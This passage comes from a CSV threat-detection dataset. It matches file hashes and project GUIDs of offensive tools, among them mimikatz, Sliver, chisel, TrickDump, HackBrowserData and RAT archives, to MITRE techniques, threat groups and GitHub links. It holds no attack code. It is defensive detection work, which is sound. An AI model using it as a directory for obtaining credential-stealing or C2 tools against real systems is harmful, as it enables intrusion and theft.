SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37089" "*c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2*",".{0,1000}c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37091" 
"*c5c2ca31085c518b48980da28238d622ba5bb77d0caf36bae116ad90c2a7920f*",".{0,1000}c5c2ca31085c518b48980da28238d622ba5bb77d0caf36bae116ad90c2a7920f.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","37093" "*c5c63b3a99d3900dbeaf864cadeeff7af57fe293aae39525d4f4eb2be118e3d7*",".{0,1000}c5c63b3a99d3900dbeaf864cadeeff7af57fe293aae39525d4f4eb2be118e3d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37094" "*C5C6F4EA-7F09-4AC7-AC2A-1246302B9856*",".{0,1000}C5C6F4EA\-7F09\-4AC7\-AC2A\-1246302B9856.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","37095" "*c5ca918f2d912ad4e74640d86a6f1da1845eb96f3193b71ad7eb231b0ce1d2a7*",".{0,1000}c5ca918f2d912ad4e74640d86a6f1da1845eb96f3193b71ad7eb231b0ce1d2a7.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37097" 
"*c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710*",".{0,1000}c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37098" "*c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710*",".{0,1000}c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37099" "*c5cc643b66c16b592ce71d7c985942c71494a8ee640940846d3d0578c932ad0e*",".{0,1000}c5cc643b66c16b592ce71d7c985942c71494a8ee640940846d3d0578c932ad0e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37100" "*c5ce3e817030e3bd925c09fcd3eaacf4705dfaacad9bdec485a4f246eb726a81*",".{0,1000}c5ce3e817030e3bd925c09fcd3eaacf4705dfaacad9bdec485a4f246eb726a81.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","37101" 
"*c5ced80616a473bd03777cf21da8a2126d107dea8c415a52bb5f7ea736d65306*",".{0,1000}c5ced80616a473bd03777cf21da8a2126d107dea8c415a52bb5f7ea736d65306.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37102" "*c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac*",".{0,1000}c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","37105" "*c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98*",".{0,1000}c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37106" "*c5e2433d83689028f6985189c18eec20838211d9ed3eb04d8a244d8a08f5d12e*",".{0,1000}c5e2433d83689028f6985189c18eec20838211d9ed3eb04d8a244d8a08f5d12e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37108" "*c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9*",".{0,1000}c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37110" "*c5ed7048e6cebc2b7612053b0f0a38c0375ec30a13a46d8456ccaeba7ba33ff1*",".{0,1000}c5ed7048e6cebc2b7612053b0f0a38c0375ec30a13a46d8456ccaeba7ba33ff1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 
- TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37112" "*c5ef421298667571d96c2156513742a66190742639400dae14232e2d802470aa*",".{0,1000}c5ef421298667571d96c2156513742a66190742639400dae14232e2d802470aa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37113" "*c5f7d585b6535e971c693b57c8a468e5cd9408da09bc91e6dabd8d3b65fe2ba2*",".{0,1000}c5f7d585b6535e971c693b57c8a468e5cd9408da09bc91e6dabd8d3b65fe2ba2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37114" "*c5fcec5642fc333a1dda82ebde876d7bbe38d63a6eb54fc80bf7b9cf00fd8ae0*",".{0,1000}c5fcec5642fc333a1dda82ebde876d7bbe38d63a6eb54fc80bf7b9cf00fd8ae0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37116" "*c5fe2c5f7455220ef30d3ed6620a2221997f6b340228a0dbad9694ffb217f232*",".{0,1000}c5fe2c5f7455220ef30d3ed6620a2221997f6b340228a0dbad9694ffb217f232.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37117" "*c6093c8bbb01042db340ac8e538e4dd0e6074541d33281ce1c4dd256073601e6*",".{0,1000}c6093c8bbb01042db340ac8e538e4dd0e6074541d33281ce1c4dd256073601e6.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37118" "*c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c*",".{0,1000}c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37119" "*c6206e0851a8c6ac7f9a9b6386a7ef7166cfbfc63d04f028cfdbe82ef523acbc*",".{0,1000}c6206e0851a8c6ac7f9a9b6386a7ef7166cfbfc63d04f028cfdbe82ef523acbc.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","37120" "*c62fd3c8190602e100681a0fc85fbffed061e3fca8d484744d5d0eb03668f661*",".{0,1000}c62fd3c8190602e100681a0fc85fbffed061e3fca8d484744d5d0eb03668f661.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37121" "*c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54*",".{0,1000}c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37122" "*c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454*",".{0,1000}c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37123" "*c6323bd50315806228e24f7521ad096683beb5483bffb3eca4bbeb4f5a81d3f3*",".{0,1000}c6323bd50315806228e24f7521ad096683beb5483bffb3eca4bbeb4f5a81d3f3.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","37124" "*c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2*",".{0,1000}c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37125" "*c639d871357cbbf7fffcb59745989ae74ec836e149695568480a9a7fba1fc591*",".{0,1000}c639d871357cbbf7fffcb59745989ae74ec836e149695568480a9a7fba1fc591.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37127" "*c63d200f9bd6313d10c66c9418104290ea09c893d7bb8c830a5da53926912464*",".{0,1000}c63d200f9bd6313d10c66c9418104290ea09c893d7bb8c830a5da53926912464.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37128" 
"*c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a*",".{0,1000}c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37129" "*c655df1762fa005766377fa896d4cd5537cfb055231e56f117479cebba1d5249*",".{0,1000}c655df1762fa005766377fa896d4cd5537cfb055231e56f117479cebba1d5249.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37130" "*c664a81f5833fc705151ebee4e25084e6a2c7315ad1324245460aaae5ed9d065*",".{0,1000}c664a81f5833fc705151ebee4e25084e6a2c7315ad1324245460aaae5ed9d065.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","37132" "*C666C98C-84C3-4A5A-A73B-2FC711CFCB7F*",".{0,1000}C666C98C\-84C3\-4A5A\-A73B\-2FC711CFCB7F.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","37133" "*C6678CDE09F4A18DD9C295262837C94E8D069295D26CE187C94C8AEDDE996CB3*",".{0,1000}C6678CDE09F4A18DD9C295262837C94E8D069295D26CE187C94C8AEDDE996CB3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37134" "*c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c*",".{0,1000}c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37135" "*c66bc18ad7289d0a5a0cf3e627566e0871cb230d6f3a2f3ede5948ebd18f2b48*",".{0,1000}c66bc18ad7289d0a5a0cf3e627566e0871cb230d6f3a2f3ede5948ebd18f2b48.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","37136" "*c672719ea7d0abfbf7b69605b975d697afeb5cad770e9cb68e57ee18d7e598d1*",".{0,1000}c672719ea7d0abfbf7b69605b975d697afeb5cad770e9cb68e57ee18d7e598d1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37139" "*c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc*",".{0,1000}c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37140" "*c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc*",".{0,1000}c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","37141" 
"*c685c2c3c886ac36781acaafd1292c4d25d4721299dcdaa1c0a79dac5ec469da*",".{0,1000}c685c2c3c886ac36781acaafd1292c4d25d4721299dcdaa1c0a79dac5ec469da.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37144" "*c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00*",".{0,1000}c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37145" 